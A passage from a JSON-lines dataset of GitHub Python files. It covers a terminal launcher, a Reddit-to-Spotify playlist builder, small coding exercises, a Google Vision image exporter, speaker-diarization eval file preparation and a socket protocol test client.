def NewTgtTerm(self, terminatorConfig = 'etc/terminator', geometry='1000x400'):\n newTgtCmd = ['terminator', '-g', terminatorConfig, '-p', 'tgt', '--geometry='+geometry, '-T', 'tgt'+str(self.tgtCount)]\n subprocess.run(newTgtCmd, start_new_session=True)\n self.tgtCount += 1\n \n def NewLocalTerm(self, terminatorConfig = 'etc/terminator', geometry='1000x400-50+50'):\n newTgtCmd = ['terminator', '-g', terminatorConfig, '-p', 'local', '--geometry='+geometry]\n print(newTgtCmd)\n subprocess.run(newTgtCmd, start_new_session=True) \n\n def TgtTermExeCmd(self, command, terminatorConfig = 'etc/terminator', geometry='1000x400-0+0'):\n newTgtCmd = ['terminator', '-g', terminatorConfig, '-p', 'tgt', '--geometry='+geometry, '-e', command]\n print(newTgtCmd)\n subprocess.run(newTgtCmd, start_new_session=True)\n \n def LocalTermExeCmd(self, command, terminatorConfig = 'etc/terminator', geometry='1000x400-50+50'):\n newTgtCmd = ['terminator', '-g', terminatorConfig, '-p', 'local', '--geometry='+geometry, '-e', command]\n print(newTgtCmd)\n subprocess.run(newTgtCmd, start_new_session=True)\n\nif __name__ == \"__main__\":\n test = TerminalSetup()\n test.NewTgtTerm()\n #test.NewTgtTerm()\n #test.NewTgtTerm()\n #test.NewLocalTerm()\n #test.LocalTermExeCmd('watch -n1 -d ip -s link show eth0')","repo_name":"Enki--/Ops-Setup","sub_path":"terminals.py","file_name":"terminals.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9922315861","text":"# coding=utf-8\nimport praw\nimport re\nimport spotipy as sp\nimport requests\nimport time\nimport datetime\nimport click\nimport spotipy.util as util\nimport os\n\n# Spotify Creds ###################################################\n# Environment variables should be set for the following:\n# SPOTIPY_CLIENT_ID, SPOTIPY_CLIENT_SECRET, SPOTIPY_REDIRECT_URI\n###################################################################\n\n# Reddit Creds ####################################################\nREDDIT_CLIENT_ID = os.environ[\"REDDIT_CLIENT_ID\"]\nREDDIT_CLIENT_SECRET = os.environ[\"REDDIT_CLIENT_SECRET\"]\n###################################################################\n\n\nclass SubredditPlaylistBuilder:\n \"\"\"\n Builds a Spotify playlist by scraping a given subreddit for \"artist - track\" pattern in submission titles.\n \"\"\"\n def __init__(self,\n spotify_username,\n subreddit=\"listentothis\"):\n\n self.spotify_username = spotify_username\n self.subreddit = subreddit\n\n # Build client sessions\n self.spotify = self._create_spotify_session()\n\n self.reddit = self._create_reddit_session()\n\n # Scrape tracks\n self.scraped_tracks = self.scrape_subreddit()\n\n # Add tracks\n self.playlist_name = None\n self.playlist_id = None\n self.add_tracks_to_playlist()\n\n def _create_spotify_session(self):\n \"\"\"\n Uses environment vars for Client ID, Secret and Redirect URI to create a Spotify\n session.\n\n :return: Instance of Spotify Session.\n \"\"\"\n scope = \"playlist-modify-private\"\n try:\n token = util.prompt_for_user_token(self.spotify_username, scope)\n\n if token:\n print(\"Successfully established Spotify session.\")\n return sp.Spotify(auth=token)\n else:\n raise ValueError(\"No token\")\n except Exception as e:\n raise e\n\n def _create_reddit_session(self):\n \"\"\"\n Uses environment vars for Client ID and Secret to create a Reddit session.\n\n :return: Instance of Reddit Session.\n \"\"\"\n\n try:\n return praw.Reddit(client_id=REDDIT_CLIENT_ID,\n client_secret=REDDIT_CLIENT_SECRET,\n user_agent='Spotty v0.1')\n except requests.HTTPError as e:\n if e.errno in [429, 500, 502, 503, 504]:\n print(\"Reddit is down (error %s), sleeping...\" % e.errno)\n time.sleep(60)\n pass\n else:\n raise e\n except Exception as e:\n print(\"couldn't Reddit: %s\" % str(e))\n\n def scrape_subreddit(self):\n \"\"\"\n Method for scraping all potential tracks from a subreddit. Submission titles\n are validated using an \"artist - title\" regex in track_validator.\n \"\"\"\n tracks = []\n\n def track_validator(submission):\n artist_regex = re.compile('(\\w.+) \\-\\-?')\n title_regex = re.compile('\\w.+ --? (\\w.+) \\[')\n\n try:\n if re.match(artist_regex, submission.title):\n artist = re.match(artist_regex, submission.title).group(1)\n if re.match(title_regex, submission.title):\n title = re.match(title_regex, submission.title).group(1)\n return artist, title\n return False\n except Exception as e:\n print(e)\n return False\n\n for submission in self.reddit.subreddit(self.subreddit).top('week'):\n try:\n tracks.append(track_validator(submission))\n except Exception as e:\n print(e)\n\n return tracks\n\n def add_tracks_to_playlist(self):\n \"\"\"\n Checks scraped tracks from Reddit exist in Spotify, builds a playlist and adds tracks.\n \"\"\"\n\n spotify_tracks = []\n\n try:\n for track in self.scraped_tracks:\n if track:\n searchtrack = self.spotify.search(\n '%s %s' %\n (track[0], track[1]))\n\n if searchtrack[\"tracks\"][\"items\"]:\n search_result_artist = searchtrack[\"tracks\"][\"items\"][0][\"artists\"][0][\"name\"]\n search_result_track = searchtrack[\"tracks\"][\"items\"][0][\"name\"]\n\n print(f\"Reddit : {track[0]} - {track[1]}\")\n print(f\"Spotify : {search_result_artist} - {search_result_track}\")\n print(\"---------------------------------------\")\n spotify_tracks.append(searchtrack[\"tracks\"][\"items\"][0][\"id\"])\n\n if spotify_tracks:\n # Create new playlist with subreddit as title\n user_id = self.spotify.me()[\"id\"]\n self.playlist_name = self.subreddit + \" - \" + str(datetime.date.today())\n self.playlist_id = self.spotify.user_playlist_create(user_id, self.playlist_name, public=False)['id']\n\n self.spotify.user_playlist_add_tracks(self.spotify.me()['id'],\n self.playlist_id,\n spotify_tracks)\n\n except Exception as e:\n print(e)\n\n\nif __name__ == \"__main__\":\n print('''\n\n\n ██████ ██▓███ ▒█████ ▄▄▄█████▓▄▄▄█████▓▓██ ██▓\n ▒██ ▒ ▓██░ ██▒▒██▒ ██▒▓ ██▒ ▓▒▓ ██▒ ▓▒ ▒██ ██▒\n ░ ▓██▄ ▓██░ ██▓▒▒██░ ██▒▒ ▓██░ ▒░▒ ▓██░ ▒░ ▒██ ██░\n ▒ ██▒▒██▄█▓▒ ▒▒██ ██░░ ▓██▓ ░ ░ ▓██▓ ░ ░ ▐██▓░\n ▒██████▒▒▒██▒ ░ ░░ ████▓▒░ ▒██▒ ░ ▒██▒ ░ ░ ██▒▓░\n ▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░░ ▒░▒░▒░ ▒ ░░ ▒ ░░ ██▒▒▒\n ░ ░▒ ░ ░░▒ ░ ░ ▒ ▒░ ░ ░ ▓██ ░▒░\n ░ ░ ░ ░░ ░ ░ ░ ▒ ░ ░ ▒ ▒ ░░\n ░ ░ ░ ░ ░\n ░ ░\n\n\n Welcome to Spotty.\n\n Spotty is a script for scraping subreddits and creating playlists!\n\n You must have a premium Spotify membership to continue.\n\n You will also need to grant Spotty access to build your playlist.\n\n Accept in your browser and paste the redirect URL in the terminal. \n\n ''')\n\n\n @click.command()\n @click.argument('username', required=True, nargs=1, type=click.STRING)\n def parse_args(username):\n SubredditPlaylistBuilder(username)\n\n parse_args()\n","repo_name":"benjaminr/spotty","sub_path":"spotty/spotty.py","file_name":"spotty.py","file_ext":"py","file_size_in_byte":7015,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"30086588047","text":"\"\"\"\r\nWrite a function that returns the number of users in a chatroom based on the\nfollowing rules:\n\n 1. If there is no one, return `\"no one online\"`.\n 2. If there is 1 person, return `\"user1 online\"`.\n 3. If there are 2 people, return `user1 and user2 online\"`.\n 4. If there are `n>2` people, return the first two names and add `\"and n-2 more online\"`.\n\nFor example, if there are 5 users, return:\n\n \"user1, user2 and 3 more online\"\n\n### Examples\n\n chatroom_status([]) ➞ \"no one online\"\n \n chatroom_status([\"paRIE_to\"]) ➞ \"paRIE_to online\"\n \n chatroom_status([\"s234f\", \"mailbox2\"]) ➞ \"s234f and mailbox2 online\"\n \n chatroom_status([\"pap_ier44\", \"townieBOY\", \"panda321\", \"motor_bike5\", \"sandwichmaker833\", \"violinist91\"])\n ➞ \"pap_ier44, townieBOY and 4 more online\"\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef chatroom_status(users):\n l = len(users)\n if l==0:\n return 'no one online'\n elif l==1:\n return '%s online'%users[0]\n elif l==2:\n return '%s and %s online'%(users[0],users[1])\n else:\n return'%s, %s and %d more online'%(users[0],users[1],len(users)-2)\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"PwGFjiSG3kXzp8rjw_6.py","file_name":"PwGFjiSG3kXzp8rjw_6.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34820033095","text":"#75\ndef qucikSort(num, lo, hi):\n def partition(lo, hi):\n pivot = nums[hi]\n left = lo\n\n for right in range(lo, hi):\n if nums[right] < pivot:\n nums[left], nums[right] = nums[right], nums[left]\n left += 1\n\n nums[left], nums[hi] = nums[hi], nums[left]\n\n return left\n\n if lo < hi:\n part = partition(lo, hi)\n qucikSort(nums, lo, part - 1)\n qucikSort(nums, part + 1, hi)\n\n\nnums = [2,8,7,1,3,5,6,4]\nqucikSort(nums, 0, len(nums) - 1)\n\nprint(nums)\n\n# 틀렸음","repo_name":"Park-min-hyoung/PAI","sub_path":"정렬/색 정렬.py","file_name":"색 정렬.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37607491800","text":"from itertools import product\n\ndef find_combinations(numbers, answer):\n operators = ['+', '-', '']\n combinations = product(operators, repeat=len(numbers)-1)\n valid = 0\n for c in combinations:\n result = [None] * (2*len(numbers) - 1)\n result[::2], result[1::2] = numbers, c\n if eval(''.join(result)) == answer:\n valid += 1\n return valid\n\ninput = [str(n+1) for n in range(8)] + [str(n) for n in range(7,0,-1)]\nprint(find_combinations(input, 42))","repo_name":"danieman/knowit2018","sub_path":"05/42.py","file_name":"42.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19307903310","text":"import os\nimport sys\n\ntry:\n import xlwt\nexcept ImportError:\n print(\"Installing Data & Time Python Library.\")\n os.system(\"sudo -H pip install xlwt\")\n import xlwt\n from xlwt import Workbook\n\ntry:\n import datetime\nexcept ImportError:\n print(\"Installing Data & Time Python Library.\")\n os.system(\"sudo -H pip install datetime\")\n import datetime\n\ntry:\n from google.cloud import vision\nexcept ImportError:\n print(\"Installing Google API Python Library.\")\n os.system(\"sudo -H pip install --ignore-installed --upgrade google-cloud-vision\")\n from google.cloud import vision\n\nimport io\nimport re\nimport unicodedata\nimport urllib2\nimport datetime\n\nfrom zipfile import ZipFile\nfrom google.cloud import vision\nfrom google.cloud.vision import types\n\n# Declare a Excel Workbook\nwb = Workbook()\n\n# Add Sheet to Excel WorkBook\nsheet1 = wb.add_sheet('Photo Sheet')\n\nfile_input = \"\"\n\nif len(sys.argv) != 2:\n if len(sys.argv) > 2:\n print(\"Too many Input file passed.\\nUsage: python script.py [filename] OR python script.py \")\n exit(0)\n else:\n csv_input = raw_input(\"No Input File given\\nPlease enter filename:\")\n file_input = csv_input\nelse:\n file_input = sys.argv[1]\n\ncurrentTime = str(datetime.datetime.now())\n\n# name of Excel file\nexcel_output_file = \"RESPONSE_\" + currentTime + \".xls\"\n\ntry:\n os.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"key.json\"\nexcept:\n print(\"Please check if \\\"key.json\\\" file exists.\")\n\n# Instantiates a client\n\ntry:\n client = vision.ImageAnnotatorClient()\nexcept:\n print(\"Can't Instantiate a Google Vision Client.\")\n print(\"Please check your Internet Connection or check if Google API \\\"key.json\\\" is available.\")\n exit(0)\n\n\ndef main():\n cleanup_images_jpg()\n get_info_from_api_flush_to_csv()\n create_zip_folder()\n cleanup_images_jpg()\n\n\n# read all URLs from file\ndef get_info_from_api_flush_to_csv():\n try:\n text_file = open(file_input, 'r')\n file_text = text_file.read()\n except:\n print(\"Bad File. Can not Open\")\n exit(0)\n text_file.close()\n\n urls = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', file_text)\n stop_word = '150x150'\n\n high_resolution_uri_list = []\n\n for uri in urls:\n if stop_word not in uri:\n high_resolution_uri_list.append(uri)\n\n count = 1\n for high_res_uri in high_resolution_uri_list:\n filename = str(count) + '.jpg'\n\n try:\n request = urllib2.Request(high_res_uri)\n img = urllib2.urlopen(request).read()\n with open(filename, 'w') as image:\n image.write(img)\n count = count + 1\n print(\"Downloaded/OK |\" + \" URL \" + high_res_uri)\n except:\n print(\"Not Downloaded/Failed - Image doesn't Exists for the URL - \" + high_res_uri)\n\n print(\"\\nImage Download Complete.\\n\")\n\n photo_cell_row = 0\n\n for i in range(count - 1):\n filename = str(i + 1) + \".jpg\"\n\n photo_name = \"Photo\" + str(i + 1)\n\n print(str(\"200 | OK | \" + filename))\n\n # Get the Full Image Path\n image_name = os.path.join(\n os.path.dirname(__file__), filename)\n\n cell_count = 0\n\n # Loads the image into memory\n with io.open(image_name, 'rb') as image_file:\n content = image_file.read()\n image = types.Image(content=content)\n\n # LABEL_DETECTION\n\n response = client.label_detection(image=image)\n labels = response.label_annotations\n\n # Write Label(s) and Score Attribute into Excel WorkBook\n\n lbl_count = 0\n for label in labels:\n lbl_count = lbl_count + 1\n cell_count = cell_count + 1\n\n sheet1.write(cell_count, photo_cell_row, \"LABEL\" + str(lbl_count))\n sheet1.write(cell_count, photo_cell_row + 1,\n unicodedata.normalize('NFKD', label.description).encode('ascii', 'ignore'))\n cell_count = cell_count + 1\n sheet1.write(cell_count, photo_cell_row, \"SCORE\" + str(lbl_count))\n sheet1.write(cell_count, photo_cell_row + 1, float(label.score))\n\n # SAFE_SEARCH_DETECTION\n\n response = client.safe_search_detection(image=image)\n safe = response.safe_search_annotation\n\n # Names of likelihood from google.cloud.vision.enums\n likelihood_name = ('UNKNOWN', 'VERY_UNLIKELY', 'UNLIKELY', 'POSSIBLE',\n 'LIKELY', 'VERY_LIKELY')\n\n # Write Safe Search Attribute into Excel WorkBook\n\n sheet1.write(cell_count + 1, photo_cell_row, 'ADULT')\n sheet1.write(cell_count + 1, photo_cell_row + 1, likelihood_name[safe.adult])\n\n sheet1.write(cell_count + 2, photo_cell_row, 'MEDICAL')\n sheet1.write(cell_count + 2, photo_cell_row + 1, likelihood_name[safe.medical])\n\n sheet1.write(cell_count + 3, photo_cell_row, 'SPOOFED')\n sheet1.write(cell_count + 3, photo_cell_row + 1, likelihood_name[safe.spoof])\n\n sheet1.write(cell_count + 4, photo_cell_row, 'VIOLENCE')\n sheet1.write(cell_count + 4, photo_cell_row + 1, likelihood_name[safe.violence])\n\n sheet1.write(cell_count + 5, photo_cell_row, 'RACY')\n sheet1.write(cell_count + 5, photo_cell_row + 1, likelihood_name[safe.racy])\n\n cell_count = cell_count + 5\n\n # END\n\n # WEB SEARCH DETECTION\n\n web_detection = client.web_detection(image=image).web_detection\n web_entities = web_detection.web_entities\n\n # Write Image Description and Scores into Excel WorkBook\n web_entities_lbl = 0\n for web_entity in web_entities:\n web_entities_lbl = web_entities_lbl + 1\n cell_count = cell_count + 1\n\n sheet1.write(cell_count, photo_cell_row, \"DESCRIPTION\" + str(web_entities_lbl))\n sheet1.write(cell_count, photo_cell_row + 1,\n unicodedata.normalize('NFKD', web_entity.description).encode('ascii', 'ignore'))\n cell_count = cell_count + 1\n sheet1.write(cell_count, photo_cell_row, \"SCORE\" + str(web_entities_lbl))\n sheet1.write(cell_count, photo_cell_row + 1, float(web_entity.score))\n\n visually_similar_images = web_detection.visually_similar_images\n\n # Write Visually Similar image URLs into Excel WorkBook\n visually_similar_images_lbl = 0\n for visually_similar_image in visually_similar_images:\n visually_similar_images_lbl = visually_similar_images_lbl + 1\n cell_count = cell_count + 1\n sheet1.write(cell_count, photo_cell_row, \"URL\" + str(visually_similar_images_lbl))\n sheet1.write(cell_count, photo_cell_row + 1, visually_similar_image.url)\n\n # Write Best Guess Label(s) into Excel WorkBook\n best_guess_labels = web_detection.best_guess_labels\n best_guess_labels_lbl = 0\n for best_guess_label in best_guess_labels:\n best_guess_labels_lbl = best_guess_labels_lbl + 1\n cell_count = cell_count + 1\n\n sheet1.write(cell_count, photo_cell_row, \"BEST_LABEL\" + str(best_guess_labels_lbl))\n sheet1.write(cell_count, photo_cell_row + 1,\n unicodedata.normalize('NFKD', best_guess_label.label).encode('ascii', 'ignore'))\n\n # END\n\n # COLOR PROPERTIES DETECTION\n\n response = client.image_properties(image=image)\n props = response.image_properties_annotation\n colors = props.dominant_colors.colors\n\n # Write Colour(s) into Excel WorkBook\n color_lbl = 0\n for color in colors:\n color_lbl = color_lbl + 1\n cell_count = cell_count + 1\n\n red = int(color.color.red)\n green = int(color.color.green)\n blue = int(color.color.blue)\n\n sheet1.write(cell_count, photo_cell_row, \"COLOUR\" + str(color_lbl))\n sheet1.write(cell_count, photo_cell_row + 1, 'R:' + str(red) + ' G:' + str(green) + ' B:' + str(blue))\n\n # END\n\n # LANGUAGE PROPERTIES DETECTION\n\n response = client.document_text_detection(image=image)\n document = response.full_text_annotation\n pages = document.pages\n\n # Write Language(s) into Excel WorkBook\n for page in pages:\n property_field = page.property\n lang_lbl = 0\n for language in property_field.detected_languages:\n lang_lbl = lang_lbl + 1\n cell_count = cell_count + 1\n sheet1.write(cell_count, photo_cell_row, \"LANGUAGE\" + str(lang_lbl))\n sheet1.write(cell_count, photo_cell_row + 1, language.language_code)\n # END\n\n # Save the photo name as Photo1, Photo2...Photo n in Excel Workbook\n sheet1.write_merge(0, 0, photo_cell_row, photo_cell_row + 1, photo_name)\n photo_cell_row = photo_cell_row + 2\n\n wb.save(excel_output_file)\n print(\"\\nFlushed content into Excel WorkBook.\\n>> \" + excel_output_file)\n\n\ndef get_all_file_paths(directory):\n # initializing empty file paths list\n image_paths = []\n\n # crawling through directory and subdirectories\n\n for root, directories, files in os.walk(directory):\n\n for image in files:\n\n if \".jpg\" in image:\n # join the two strings in order to form the full image_path.\n image_path = os.path.join(root, image)\n image_paths.append(image_path)\n\n if excel_output_file in image:\n # join the two strings in order to form the full image_path.\n image_path = os.path.join(root, image)\n image_paths.append(image_path)\n\n # returning all image paths\n return image_paths\n\n\ndef create_zip_folder():\n # path to folder which needs to be zipped\n directory = './'\n\n # calling function to get all file paths in the directory\n file_paths = get_all_file_paths(directory)\n\n # writing files to a zipfile\n with ZipFile(str(currentTime) + '-IMGS.zip', 'w') as zip:\n # writing each file one by one\n for file in file_paths:\n zip.write(file)\n print('\\nCompressed Zipped Folder Created.\\n>> ' + str(currentTime) + '-IMGS.zip')\n\n\ndef cleanup_images_jpg():\n filelist = [f for f in os.listdir('./') if f.endswith(\".jpg\")]\n for f in filelist:\n os.remove(os.path.join('./', f))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"amarkum/instagram-exporter","sub_path":"instagram-export.py","file_name":"instagram-export.py","file_ext":"py","file_size_in_byte":10437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6883126866","text":"\"\"\"Converts eval files to correct format for decoding and scoring.\"\"\"\n\nimport kaldiio\nimport configargparse\nimport numpy as np\n\nfrom data_loading import build_segment_desc_dict, build_segment_dicts, get_file_paths\nfrom data_aug import write_to_ark, write_to_json\n\n\ndef prepare_split_eval(meetings, speakers, meeting_length=100):\n \"\"\"Split eval set into meetings of equal length, keeping order. Correct format for decoding.\n Write to json after calling this function.\n \n :param: dict meetings[meeting_id] = List[dvectors] (lists of segments for each meeting)\n :param: dict speakers[meeting_id] = List[str] (speaker label sequences)\n :param: int number of segments to split meetings into\n\n :return: dict meetings[split_meeting_id] = List[dvectors]: split meetings\n :return: dict speakers[split_meeting_id] = List[str]: split speaker sequences\n \"\"\"\n\n split_meetings = {}\n split_speakers = {}\n for meeting_id, meeting in meetings.items():\n split_meeting_num = 0\n segment_index = 0\n while segment_index + meeting_length <= len(meeting):\n # new meeting id removes MDM and appends split meeting digits with preceding zeros\n split_meeting_id = meeting_id[:3] + meeting_id[6:] + '-' + f\"{split_meeting_num:03d}\"\n split_meetings[split_meeting_id] = meeting[segment_index:segment_index+meeting_length]\n split_speakers[split_meeting_id] = speakers[meeting_id][segment_index:segment_index+meeting_length]\n segment_index += meeting_length\n split_meeting_num += 1\n if segment_index < len(meeting):\n # final split meeting may be shorter than meeting_length\n split_meeting_id = meeting_id[:3] + meeting_id[6:] + '-' + f\"{split_meeting_num:03d}\"\n split_meetings[split_meeting_id] = meeting[segment_index:]\n split_speakers[split_meeting_id] = speakers[meeting_id][segment_index:]\n\n return split_meetings, split_speakers\n\n\ndef produce_eval_scp(meetings, speakers, segment_desc_dict, dataset='eval'):\n \"\"\"Produces eval.scp in format required for scoring script (each line is one window).\n \n :param: dict meetings[meeting_id] = List[dvectors] (lists of segments for each meeting)\n :param: dict segment_desc_dict[meeting_id] = List(Tuple(start_index, end_index, speaker_label,\n start_time, end_time, duration))\n \"\"\"\n scp_meetings = {}\n scp_speakers = {}\n if dataset == 'eval':\n # this matches to existing scp\n speaker_mapping = {'MEE073': 174, 'FEO070': 175, 'FEO072': 176, 'MEE071': 177, 'MEO015': 178, \\\n 'FEE013': 179, 'MEE014': 180, 'FEE016': 181, 'FIE088': 182, 'FIO087': 183, 'FIO084': 184, \\\n 'FIO089': 185, 'MTD009PM': 186, 'MTD011UID': 187, 'MTD0010ID': 188, 'MTD012ME': 189}\n elif dataset == 'dev':\n speaker_mapping = {}\n current_speaker_num = 174\n for meeting_id, meeting in meetings.items():\n for segment_index in range(len(meeting)):\n start_time = round(segment_desc_dict[meeting_id][segment_index][3] * 100)\n end_time = round(segment_desc_dict[meeting_id][segment_index][4] * 100)\n speaker = speakers[meeting_id][segment_index]\n try:\n speaker_number = speaker_mapping[speaker]\n except:\n speaker_mapping[speaker] = current_speaker_num\n current_speaker_num += 1\n speaker_number = speaker_mapping[speaker]\n scp_meeting_id = 'AMIXXX-' + f\"{speaker_number:05d}\" + '-' + meeting_id[7:] + '-XXXXXX-11_XXXXXXX_' + \\\n f\"{start_time:07d}\" + \"_\" + f\"{end_time:07d}\"\n scp_speakers[scp_meeting_id] = speaker_number\n scp_meetings[scp_meeting_id] = meeting[segment_index]\n with kaldiio.WriteHelper('ark,scp:/home/mifs/jhrt2/newDNC/scoring/scoring_%s.ark,/home/mifs/jhrt2/newDNC/scoring/scoring_%s.scp' % (dataset, dataset)) as writer:\n for speaker_number in sorted(speaker_mapping.values()):\n for scp_meeting_id in scp_meetings:\n if scp_speakers[scp_meeting_id] == speaker_number:\n writer(scp_meeting_id, scp_meetings[scp_meeting_id])\n\n\ndef get_parser(): # official paths should be maintained in asr_train.py\n parser = configargparse.ArgumentParser(\n description=\"Prepare eval files\",\n config_file_parser_class=configargparse.YAMLConfigFileParser,\n formatter_class=configargparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--eval-emb', type=str,\n default=\"/home/mifs/jhrt2/newDNC/data/arks.meeting.cmn.tdnn/eval.scp\", help='')\n # parser.add_argument('--eval-emb', type=str,\n # default=\"/home/mifs/jhrt2/newDNC/data/arks.concat/eval.scp\", help='')\n parser.add_argument('--eval-rttm', type=str,\n default=\"/home/mifs/jhrt2/newDNC/data/window_level_rttms/eval150_window_level.rttm\", help='')\n # parser.add_argument('--eval-emb', type=str,\n # default=\"/data/mifs_scratch/jhrt2/james/eval150\", help='')\n # parser.add_argument('--eval-rttm', type=str,\n # default=\"/home/mifs/jhrt2/newDNC/data/rttms.concat/eval.rttm\", help='')\n\n # parser.add_argument('--valid-emb', type=str,\n # default=\"/home/mifs/jhrt2/newDNC/data/arks.meeting.cmn.tdnn/dev.scp\", help='')\n # note there are two dev window level rttms. Here using the silence stripped version\n # parser.add_argument('--valid-rttm', type=str,\n # default=\"/home/mifs/jhrt2/newDNC/data/rttms.concat/dev.rttm\", help='')\n parser.add_argument('--tdoa-directory', type=str,\n default=\"/data/mifs_scratch/jhrt2/BeamformIt/MDM_AMI_fixedref_10\", help='')\n return parser\n\n\ndef main():\n parser = get_parser()\n args, _ = parser.parse_known_args()\n dataset = 'eval' # NB: IF DO DEV, REMEMBER NOT DOING VAR NORMALISATION IN DATA_LOADING\n scp_path, rttm_path = get_file_paths(args, dataset)\n\n meetings, speakers = build_segment_dicts(args, dataset, emb=\"dvec\", tdoa=True, gccphat=True, tdoa_norm=False)\n for meeting_id in meetings:\n meetings[meeting_id] = np.array(meetings[meeting_id])\n\n meeting_length = 3385\n\n segment_desc_dict, _ = build_segment_desc_dict(rttm_path)\n\n produce_eval_scp(meetings, speakers, segment_desc_dict, dataset)\n\n split_meetings, split_speakers = prepare_split_eval(meetings, speakers, meeting_length)\n write_to_ark(split_meetings, dataset, \"None\")\n write_to_json(split_meetings, split_speakers, dataset, \"None\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jamest08/newDNC","sub_path":"espnet/data_prep/prep_eval_files.py","file_name":"prep_eval_files.py","file_ext":"py","file_size_in_byte":6568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42504104358","text":"import sys\nimport socket\nimport time\nimport json\nimport argparse\n\nfrom interfaces import verbose_print, vverbose_print\nfrom protocom import pMsg, pMsgTyp, RemoteEnd\n\nBUFFER_SIZE = 128\nGameOn = 1\n\n# secret used to verify when connecting\ntest_conf = {\"writerlist\": {}, \"secret\": \"42\"}\ntest_conf[\"writerlist\"][0] = {\"ip\": \"127.0.0.1\", \"protocol_port\": 15000}\ntest_conf[\"writerlist\"][1] = {\"ip\": \"127.0.0.1\", \"protocol_port\": 15001}\ntest_conf[\"writerlist\"][2] = {\"ip\": \"127.0.0.1\", \"protocol_port\": 15002}\ntest_conf[\"writerlist\"][3] = {\"ip\": \"127.0.0.1\", \"protocol_port\": 15003}\ntest_conf[\"writerlist\"][4] = {\"ip\": \"127.0.0.1\", \"protocol_port\": 15004}\n\nclass mMsg(str):\n pass\n\ndef create_event(me, send_to):\n try:\n msg = input(\n \"Enter the next event : \"\n ) # input format Type Name Text - where Each are a single word\n # t, n, txt = m.split(\" \")\n except KeyboardInterrupt:\n return json.dumps({name: {\"type\": \"Error\", \"name\": \"N/A\", \"payload\": \"Error\"}})\n except Exception as e:\n print(\"ERROR:\", type(e), e)\n raise\n\n event = f\"{me}#{send_to}#{msg}\"\n return pMsg.format_msg(event)\n\n\nif __name__ == \"__main__\":\n ap = argparse.ArgumentParser()\n ap.add_argument(\n \"configfile\",\n nargs=\"?\",\n type=argparse.FileType(\"r\"),\n default=\"../testdata/config.writer\",\n help=\"configuration file (default stdin)\",\n )\n ap.add_argument(\"-me\", default=1, type=int, help=\"ID fyrir skrifara, mandatory\")\n ap.add_argument(\"-v\", default=True, type=bool, help=\"verbose\")\n ap.add_argument(\"-vv\", default=False, type=bool, help=\"Very verbose\")\n a = ap.parse_args()\n\n print(\"Running\")\n verbose_print(sys.argv[0], \"config: \", a.configfile, \"me:\", a.me, a.v, a.vv)\n verbose = a.v\n vverbose = a.vv\n verbose_print(\"\")\n\n \"\"\"\n read_data = a.configfile.read()\n config_list_of_peers = json.loads(read_data)\n verbose_print(config_list_of_peers)\n me = a.myID\n host = ''\n port = 0\n list_of_peers = {}\n for peer in config_list_of_peers:\n id = int(peer[\"id\"])\n if id == a.myID:\n host = peer[\"host\"] \n port = int(peer[\"protocol_port\"])\n else:\n paddr = peer[\"host\"], int(peer[\"protocol_port\"])\n list_of_peers[id] = paddr\n\n verbose_print(list_of_peers)\n \"\"\"\n\n list_of_peers = {}\n for pid, peer in test_conf[\"writerlist\"].items():\n id = int(pid)\n paddr = peer[\"ip\"], int(peer[\"protocol_port\"])\n list_of_peers[id] = paddr\n\n name = \"TESTclient\"\n # for pid, address in list_of_peers.items():\n # if pid != a.me:\n r_pid = 0\n r_address = list_of_peers[r_pid]\n\n print(\"Connecting to :\", r_address)\n host, port = r_address\n rpeer = RemoteEnd(r_pid, host, port)\n rpeer.connect()\n # s.settimeout(4)\n\n # Handshake initiate\n # msg = pMsg.verify_msg(a.me,r_pid)\n msg = pMsg.make_msg(pMsgTyp.c_request, a.me, r_pid, data=\"Geheimnis\")\n bmsg = pMsg.format_msg(msg)\n print(bmsg)\n print(pMsg.make_msg(pMsgTyp.c_reply, a.me, r_pid, data=\"Geheimnis Reply\"))\n rpeer.send_bytes(bmsg)\n # s.sendall(bmsg)\n\n # Handshake complete\n try:\n msg = rpeer.recv_bytes()\n print(msg)\n except KeyboardInterrupt:\n pass\n except socket.timeout as e:\n print(\"Error: Timeout - remote end hung up\") # , type(e), e.args)\n else:\n while True:\n \"\"\"try:\n msg = pMsg.read_single_msg(s)\n #data = sock.recv(BUFFER_SIZE)\n print(msg)\n except KeyboardInterrupt:\n break\n except socket.timeout as e:\n print(\"Error: Timeout - remote end hung up\") #, type(e), e.args)\n break\n \"\"\"\n # msg = data.decode()\n print(\" -- Invite :\", msg)\n\n event = create_event(a.me, r_pid)\n print(event)\n rpeer.send_bytes(event)\n time.sleep(2)\n\n","repo_name":"pieceofGit/Annall_Lightweight_Blockchain","sub_path":"src/tests/testProtocom.py","file_name":"testProtocom.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"33570092410","text":"from collections import deque\r\n\r\nn, m, r = map(int, input().split())\r\ngraph = [[] for _ in range(n + 1)]\r\n\r\nvisited = [False] * (n + 1)\r\n\r\nfor _ in range(m):\r\n a, b = map(int, input().split())\r\n graph[a].append(b)\r\n graph[b].append(a)\r\n\r\n\r\ndef dfs(v, visited):\r\n 